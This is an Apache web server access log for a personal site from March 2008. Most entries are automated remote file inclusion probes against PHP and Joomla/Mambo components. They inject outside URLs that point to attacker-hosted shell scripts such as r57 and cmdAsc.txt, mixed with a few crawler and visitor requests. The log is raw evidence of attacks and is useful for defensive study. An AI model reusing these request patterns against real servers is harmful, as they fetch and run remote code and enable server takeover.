81.52.143.16 - - [02/Mar/2008:08:05:01 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (http://www.voila.com/)" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:05:45 -0800] "GET /logs/access_080211.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:07:55 -0800] "GET /logs/access_080211.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Links (2.1pre17; Linux 2.6.11-gentoo-r8 i686; 80x24)" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:08:04 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://h1.ripway.com/erinteam/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:08:04 -0800] "GET /claroline/tracking/userLog.php?rootSys=http://h1.ripway.com/erinteam/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.204.97.53 - - [02/Mar/2008:08:08:54 -0800] "GET /logs/access_080108.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.tcww.info/kobraid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
203.204.97.53 - - [02/Mar/2008:08:08:54 -0800] "GET /logs/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://www.tcww.info/kobraid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:09:52 -0800] "GET /logs/access_080108.log//content/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:09:52 -0800] "GET //content/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:09:52 -0800] "GET /logs//content/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:09:53 -0800] "GET /logs/access_080107.log//content/include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://hornydate.co.uk/sys.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.94.179 - - [02/Mar/2008:08:10:06 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:10:36 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:10:39 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:10:59 -0800] "GET /logs/access_080131.log/index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:11:00 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:11:03 -0800] "GET /index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:11:06 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:11:07 -0800] "GET /logs/index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:11:21 -0800] "GET /logs/access_080131.log/index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:11:25 -0800] "GET /index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:11:29 -0800] "GET /logs/index.php?pag=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:11:30 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
61.19.30.146 - - [02/Mar/2008:08:11:55 -0800] "GET /logs/access_080131.log/index.php?pagina=http://www.clubwizard.co.uk/link_tracker/rlz/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:12:20 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.19.157 - - [02/Mar/2008:08:12:31 -0800] "GET /minamijewelry/source_images/batch1/ HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:13:07 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:13:07 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:13:08 -0800] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:13:19 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:13:21 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:13:21 -0800] "GET /logs//photoalb/lib/static/header.php?set_menu=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:13:21 -0800] "GET //photoalb/lib/static/header.php?set_menu=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
71.136.44.222 - - [02/Mar/2008:08:13:21 -0800] "GET /bikes/dteel/ HTTP/1.1" 200 9517 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:13:26 -0800] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:13:26 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:13:26 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.60.6 - - [02/Mar/2008:08:13:48 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://rafb.net/p/oQh6dE84.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
209.160.33.164 - - [02/Mar/2008:08:13:52 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.tecumsehscoutcabin.org//calendar/setup/vi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.28.71 - - [02/Mar/2008:08:14:25 -0800] "GET /minamijewelry/source_images/batch1/?M=A HTTP/1.0" 200 5016 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.187.94.179 - - [02/Mar/2008:08:14:43 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:14:43 -0800] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
82.165.253.72 - - [02/Mar/2008:08:14:45 -0800] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://smolen.org/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
71.136.44.222 - - [02/Mar/2008:08:16:25 -0800] "GET /bikes/dteel/2008_02_16/ HTTP/1.1" 200 1696 "http://www.dmulk.com/bikes/dteel/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.136.44.222 - - [02/Mar/2008:08:16:27 -0800] "GET /bikes/dteel/2008_02_16/Arryo_Seco/ HTTP/1.1" 200 8443 "http://www.dmulk.com/bikes/dteel/2008_02_16/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:16:56 -0800] "GET /logs/errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
72.9.159.178 - - [02/Mar/2008:08:16:56 -0800] "GET /errors.php?error=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:17:04 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:17:06 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:17:06 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:17:40 -0800] "GET //?index.php?mosConfig_absolute_path=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 200 3094 "-" "libwww-perl/5.79" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:17:51 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:08:18:07 -0800] "GET /logs/access_080117.log//admin/index.php?o=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:08:18:07 -0800] "GET //admin/index.php?o=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [02/Mar/2008:08:18:07 -0800] "GET /logs//admin/index.php?o=http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
150.162.141.2 - - [02/Mar/2008:08:18:08 -0800] "GET /logs/access_080122.log//?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
150.162.141.2 - - [02/Mar/2008:08:18:09 -0800] "GET //?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.806" "www.dmulk.com"
150.162.141.2 - - [02/Mar/2008:08:18:09 -0800] "GET //?mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 200 3094 "-" "libwww-perl/5.806" "www.dmulk.com"
150.162.141.2 - - [02/Mar/2008:08:18:09 -0800] "GET /logs//?mosConfig_absolute_path=http://theninjalegion.com/safe.txt?? HTTP/1.1" 200 36979 "-" "libwww-perl/5.806" "www.dmulk.com"
150.162.141.2 - - [02/Mar/2008:08:18:09 -0800] "GET /logs//?mosConfig_absolute_path=http://forum.ivc.com.ua//language/lang_polish/id??? HTTP/1.1" 200 36979 "-" "libwww-perl/5.806" "www.dmulk.com"
67.15.10.95 - - [02/Mar/2008:08:18:30 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.forpinkpussy.com/languages/.inc/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:19:30 -0800] "GET /logs/access.log//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:19:33 -0800] "GET //components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.61.196.190 - - [02/Mar/2008:08:19:37 -0800] "GET /logs//components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:19:46 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:19:46 -0800] "GET //admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:19:47 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.19.200 - - [02/Mar/2008:08:19:51 -0800] "GET / HTTP/1.0" 200 3078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:08:20:25 -0800] "GET /logs//pafiledb/includes/pafiledb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
77.232.66.107 - - [02/Mar/2008:08:20:26 -0800] "GET //pafiledb/includes/pafiledb_constants.php?module_root_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
82.66.124.141 - - [02/Mar/2008:08:20:33 -0800] "GET /logs/access_080215.log//admin/business_inc/saveserver.php?thisdir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:08:20:50 -0800] "GET /logs/access_080207.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:08:20:52 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:08:20:54 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.164.34 - - [02/Mar/2008:08:21:05 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://usuarios.lycos.es/arquivos/cmdAsc.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.26.154 - - [02/Mar/2008:08:21:35 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.jukensei.com/arskobo/modules/mailbbs/imgs/sikud.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:21:50 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:21:50 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:21:50 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.36.169.130 - - [02/Mar/2008:08:22:01 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [02/Mar/2008:08:22:12 -0800] "GET /logs/access.log//main.php?pageURL=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [02/Mar/2008:08:22:13 -0800] "GET //main.php?pageURL=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.200.223 - - [02/Mar/2008:08:22:13 -0800] "GET /logs//main.php?pageURL=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:08:22:24 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
64.185.237.35 - - [02/Mar/2008:08:22:24 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://hellinsoloradio.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:08:22:36 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
72.29.89.114 - - [02/Mar/2008:08:22:36 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
80.176.226.120 - - [02/Mar/2008:08:22:46 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.emailnotices.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.79.234.84 - - [02/Mar/2008:08:23:04 -0800] "GET /logs/access.log//main.php?pageURL=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [02/Mar/2008:08:23:04 -0800] "GET //main.php?pageURL=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.79.234.84 - - [02/Mar/2008:08:23:05 -0800] "GET /logs//main.php?pageURL=http://sierra-hulinggi.com/alat/cmdasca????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:23:56 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:23:56 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:23:56 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:23:56 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:23:56 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
65.99.202.130 - - [02/Mar/2008:08:23:56 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:24:08 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:24:08 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:24:09 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:24:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:24:09 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
213.194.173.64 - - [02/Mar/2008:08:24:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/pacos/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
85.25.10.85 - - [02/Mar/2008:08:24:25 -0800] "GET /logs//index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
85.25.10.85 - - [02/Mar/2008:08:24:26 -0800] "GET //index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:08:25:14 -0800] "GET /index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
87.118.102.153 - - [02/Mar/2008:08:25:16 -0800] "GET /logs/index.php?option=com_poll&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
217.195.193.190 - - [02/Mar/2008:08:25:34 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://www.underuaeh.com/images/banners/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:08:25:42 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:08:25:43 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:08:25:43 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.96.70.220 - - [02/Mar/2008:08:25:44 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
